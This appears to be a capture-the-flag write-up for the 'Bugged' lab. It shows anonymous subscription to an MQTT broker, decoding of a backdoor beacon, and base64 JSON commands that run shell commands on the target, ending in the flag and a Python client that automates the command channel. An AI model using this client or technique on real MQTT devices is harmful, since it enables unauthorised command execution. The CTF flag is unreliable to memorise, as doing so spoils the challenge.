Bugged

SwayamInduShashi
2 min read, 1 day ago

Started with a basic nmap scan ... no result.

Installed and used rustscan (install Docker: “sudo apt install docker.io”, then “sudo apt install cargo” and “cargo install rustscan”).

There are many ways to install it and you may or may not be able to install it properly; it may need to be uninstalled several times. If you can install it within an hour, consider yourself lucky and buy a lottery ticket. Otherwise you are in for a very long ride. Enjoy!

Make thorough use of Pentester’s GPT if you want to be quicker.

Run “rustscan -a 10.10.159.75 --config-path /home/kali/.rustscan.tom”

We got:

PORT     STATE SERVICE REASON
1883/tcp open  mqtt    syn-ack

Then run nmap against port 1883: “nmap -A -p 1883 10.10.159.75”

THEORY ON MQTT

MQTT (originally “MQ Telemetry Transport”) is a publish/subscribe messaging protocol that is extremely simple and lightweight, designed for constrained devices and low-bandwidth, high-latency or unreliable networks. Its design goals are to minimise network bandwidth and device resource requirements while still offering reliability and some degree of assured delivery. Those properties make it well suited to “machine-to-machine” (M2M) and “Internet of Things” deployments, and to mobile applications where bandwidth and battery power are at a premium.

What matters for this box: clients publish messages to a topic on a broker, and every client subscribed to that topic receives them. Topics are hierarchical, “/”-separated strings, and a subscription may use the wildcards “+” (one level) and “#” (everything below). The broker does not have to require credentials, and when it accepts anonymous connections a single subscription to “#” shows every message passing through it.

Default port: 1883 (8883 for MQTT over TLS)

For more on MQTT topics and best practices: https://www.hivemq.com/blog/mqtt-essentials-part-5-mqtt-topics-best-practices/

Use “sudo nmap <ip> -p 1883 -sC -sV” for further details:

PORT     STATE SERVICE   VERSION
1883/tcp open  mosquitto version 2.0.14

Install the Mosquitto client tools:

“sudo apt-get install mosquitto mosquitto-clients -y”

Then subscribe to every topic on the broker with the “#” wildcard (no username or password needed, which is the actual weakness here; adding -v to mosquitto_sub prints the topic name in front of each payload, useful when more than one topic is active):

“mosquitto_sub -h <ip> -p 1883 -t "#"”

We get:

eyJpZCI6ImNkZDFiMWMwLTFjNDAtNGIwZi04ZTIyLTYxYjM1NzU0OGI3ZCIsInJlZ2lzdGVyZWRfY29tbWFuZHMiOlsiSEVMUCIsIkNNRCIsIlNZUyJdLCJwdWJfdG9waWMiOiJVNHZ5cU5sUXRmLzB2b3ptYVp5TFQvMTVIOVRGNkNIZy9wdWIiLCJzdWJfdG9waWMiOiJYRDJyZlI5QmV6L0dxTXBSU0VvYmgvVHZMUWVoTWcwRS9zdWIifQ==

which base64-decodes to:

{"id":"cdd1b1c0-1c40-4b0f-8e22-61b357548b7d","registered_commands":["HELP","CMD","SYS"],"pub_topic":"U4vyqNlQtf/0vozmaZyLT/15H9TF6CHg/pub","sub_topic":"XD2rfR9Bez/GqMpRSEobh/TvLQehMg0E/sub"}

The device is announcing itself, and the fields tell us everything needed to talk to it:

id: cdd1b1c0-1c40-4b0f-8e22-61b357548b7d, the backdoor’s identifier

registered_commands: “HELP”, “CMD”, “SYS”, the commands it accepts

pub_topic: “U4vyqNlQtf/0vozmaZyLT/15H9TF6CHg/pub”, the topic the device publishes its output to (so we subscribe here)

sub_topic: “XD2rfR9Bez/GqMpRSEobh/TvLQehMg0E/sub”, the topic the device listens on for commands (so we publish here)

In one terminal, subscribe to the device’s output topic and leave it running (note the target IP is now 10.10.20.204):

mosquitto_sub -t "U4vyqNlQtf/0vozmaZyLT/15H9TF6CHg/pub" -h 10.10.20.204

In another terminal, act as the controller and publish a test message to the topic the device listens on:

mosquitto_pub -t "XD2rfR9Bez/GqMpRSEobh/TvLQehMg0E/sub" -m "simple_message" -h 10.10.20.204

The reply shows up in the first terminal, again base64-encoded:

SW52YWxpZCBtZXNzYWdlIGZvcm1hdC4KRm9ybWF0OiBiYXNlNjQoeyJpZCI6ICI8YmFja2Rvb3IgaWQ+IiwgImNtZCI6ICI8Y29tbWFuZD4iLCAiYXJnIjogIjxhcmd1bWVudD4ifSk=

which decodes to:

Invalid message format.
Format: base64({"id": "<backdoor id>", "cmd": "<command>", "arg": "<argument>"})

So a valid command is a JSON object in that format, base64-encoded, and the “id” must be the one from the beacon. Let’s build one:

{"id": "<backdoor id>", "cmd": "<command>", "arg": "<argument>"}

id: cdd1b1c0-1c40-4b0f-8e22-61b357548b7d

cmd: CMD

arg: ls

{"id": "cdd1b1c0-1c40-4b0f-8e22-61b357548b7d", "cmd": "CMD", "arg": "ls"}

Base64-encoded, that is:

eyJpZCI6ICJjZGQxYjFjMC0xYzQwLTRiMGYtOGUyMi02MWIzNTc1NDhiN2QiLCAiY21kIjogIkNNRCIsICJhcmciOiAibHMifQ==

Now put it in the mosquitto_pub command:

mosquitto_pub -t "XD2rfR9Bez/GqMpRSEobh/TvLQehMg0E/sub" -m "eyJpZCI6ICJjZGQxYjFjMC0xYzQwLTRiMGYtOGUyMi02MWIzNTc1NDhiN2QiLCAiY21kIjogIkNNRCIsICJhcmciOiAibHMifQ==" -h 10.10.20.204

We get back:

eyJpZCI6ImNkZDFiMWMwLTFjNDAtNGIwZi04ZTIyLTYxYjM1NzU0OGI3ZCIsInJlc3BvbnNlIjoiZmxhZy50eHRcbiJ9

which decodes to:

{"id":"cdd1b1c0-1c40-4b0f-8e22-61b357548b7d","response":"flag.txt\n"}

So the backdoor runs our argument as a shell command and returns the output. Same again with cat flag.txt:

{"id": "cdd1b1c0-1c40-4b0f-8e22-61b357548b7d", "cmd": "CMD", "arg": "cat flag.txt"}

Base64-encoded (this blob ends in an encoded CR LF, a line ending that the encoding tool appended after the closing brace; the backdoor’s JSON parser ignored the trailing whitespace, but encoding with “echo -n '<json>' | base64” avoids it):

eyJpZCI6ICJjZGQxYjFjMC0xYzQwLTRiMGYtOGUyMi02MWIzNTc1NDhiN2QiLCAiY21kIjogIkNNRCIsICJhcmciOiAiY2F0IGZsYWcudHh0In0NCg==

mosquitto_pub -t "XD2rfR9Bez/GqMpRSEobh/TvLQehMg0E/sub" -m "eyJpZCI6ICJjZGQxYjFjMC0xYzQwLTRiMGYtOGUyMi02MWIzNTc1NDhiN2QiLCAiY21kIjogIkNNRCIsICJhcmciOiAiY2F0IGZsYWcudHh0In0NCg==" -h 10.10.20.204

We get:

eyJpZCI6ImNkZDFiMWMwLTFjNDAtNGIwZi04ZTIyLTYxYjM1NzU0OGI3ZCIsInJlc3BvbnNlIjoiZmxhZ3sxOGQ0NGZjMDcwN2FjOGRjOGJlNDViYjgzZGI1NDAxM31cbiJ9

which decodes to:

{"id":"cdd1b1c0-1c40-4b0f-8e22-61b357548b7d","response":"flag{18d44fc0707ac8dc8be45bb83db54013}\n"}

Checkmate!
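To tie the whole exchange together, here is an added example (my own code, not part of the original write-up or of the room) that implements the backdoor’s base64(JSON) protocol as a small client: it parses the beacon seen on the wildcard subscription, builds commands byte-for-byte as they were encoded by hand above, and classifies replies, distinguishing a JSON response from the plain-text “Invalid message format” error. The run_command() function drives a live exchange by shelling out to mosquitto_sub and mosquitto_pub; it assumes the mosquitto-clients package is installed and a broker is reachable, and the host 10.10.20.204 is simply the address from this write-up.

```python
"""Client for the backdoor's base64(JSON) command protocol (added example, not the room's code)."""
import base64
import binascii
import json
import subprocess
import time
import uuid

# Beacon captured from the "#" wildcard subscription (copied from the write-up above).
BEACON_B64 = "eyJpZCI6ImNkZDFiMWMwLTFjNDAtNGIwZi04ZTIyLTYxYjM1NzU0OGI3ZCIsInJlZ2lzdGVyZWRfY29tbWFuZHMiOlsiSEVMUCIsIkNNRCIsIlNZUyJdLCJwdWJfdG9waWMiOiJVNHZ5cU5sUXRmLzB2b3ptYVp5TFQvMTVIOVRGNkNIZy9wdWIiLCJzdWJfdG9waWMiOiJYRDJyZlI5QmV6L0dxTXBSU0VvYmgvVHZMUWVoTWcwRS9zdWIifQ=="


def decode_message(blob):
    """Base64-decode an MQTT payload and parse it as JSON.

    Returns (obj, None) for a JSON message and (None, text) when the payload
    decodes to something else: the backdoor answers a malformed command with a
    plain-text error instead of JSON, so callers must expect both shapes.
    """
    try:
        raw = base64.b64decode(blob.strip(), validate=True)
    except (binascii.Error, ValueError):
        return None, blob  # not base64 at all; hand the raw payload back
    text = raw.decode("utf-8", errors="replace")
    try:
        return json.loads(text), None  # json.loads tolerates trailing CR LF
    except json.JSONDecodeError:
        return None, text


def parse_beacon(blob):
    """Validate the device's self-registration beacon and return its fields."""
    obj, text = decode_message(blob)
    if obj is None:
        raise ValueError("beacon is not base64(JSON): %r" % text)
    missing = {"id", "registered_commands", "pub_topic", "sub_topic"} - obj.keys()
    if missing:
        raise ValueError("beacon missing fields: %s" % sorted(missing))
    uuid.UUID(obj["id"])  # the id is a UUID; reject garbage early
    return obj


def build_command(backdoor_id, cmd, arg, registered=None):
    """Build base64({"id": ..., "cmd": ..., "arg": ...}) exactly as the backdoor expects.

    json.dumps' default separators (", " and ": ") reproduce the payloads shown
    in the write-up byte for byte, and no trailing newline is appended (which is
    what `echo ... | base64` without -n would add).
    """
    if registered is not None and cmd not in registered:
        raise ValueError("%r is not in registered_commands %s" % (cmd, registered))
    body = json.dumps({"id": backdoor_id, "cmd": cmd, "arg": arg})
    return base64.b64encode(body.encode("utf-8")).decode("ascii")


def parse_response(blob, expected_id):
    """Classify a message seen on pub_topic; only accept replies for our backdoor id."""
    obj, text = decode_message(blob)
    if obj is None:
        return {"ok": False, "error": text}  # e.g. "Invalid message format. ..."
    if obj.get("id") != expected_id:
        return {"ok": False, "error": "response for another id: %r" % obj.get("id")}
    return {"ok": True, "response": obj.get("response", "")}


def run_command(host, beacon, cmd, arg, timeout=10, port=1883):
    """Send one command over the broker and return the parsed reply.

    Needs mosquitto-clients and a live broker (assumption; not exercised offline).
    Subscribe first with -C 1 (exit after one message) and -W (give up after
    `timeout` seconds), give the SUBSCRIBE a moment to complete, then publish
    the command to the device's sub_topic.
    """
    sub = subprocess.Popen(
        ["mosquitto_sub", "-h", host, "-p", str(port), "-t", beacon["pub_topic"],
         "-C", "1", "-W", str(timeout)],
        stdout=subprocess.PIPE, text=True,
    )
    time.sleep(1)  # crude, but avoids publishing before the subscription is active
    payload = build_command(beacon["id"], cmd, arg, beacon["registered_commands"])
    subprocess.run(
        ["mosquitto_pub", "-h", host, "-p", str(port), "-t", beacon["sub_topic"], "-m", payload],
        check=True,
    )
    out, _ = sub.communicate(timeout=timeout + 5)
    if not out.strip():
        return {"ok": False, "error": "no reply before timeout"}
    return parse_response(out.strip().splitlines()[0], beacon["id"])


if __name__ == "__main__":
    import sys
    # Usage: python3 bugged_client.py [host] [shell command...]; defaults are the write-up's.
    beacon = parse_beacon(BEACON_B64)
    host = sys.argv[1] if len(sys.argv) > 1 else "10.10.20.204"
    print(run_command(host, beacon, "CMD", " ".join(sys.argv[2:]) or "ls"))
```

The pure helpers are what make this safe to reuse: a reply that is not JSON is surfaced as an error rather than blowing up the client, and a command not listed in registered_commands is refused before anything hits the wire.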


Written by SwayamInduShashi

I'm a cyber-security enthusiast, student and a hands on experimenter. I'm going to try to test and learn something new and will be documenting my process.
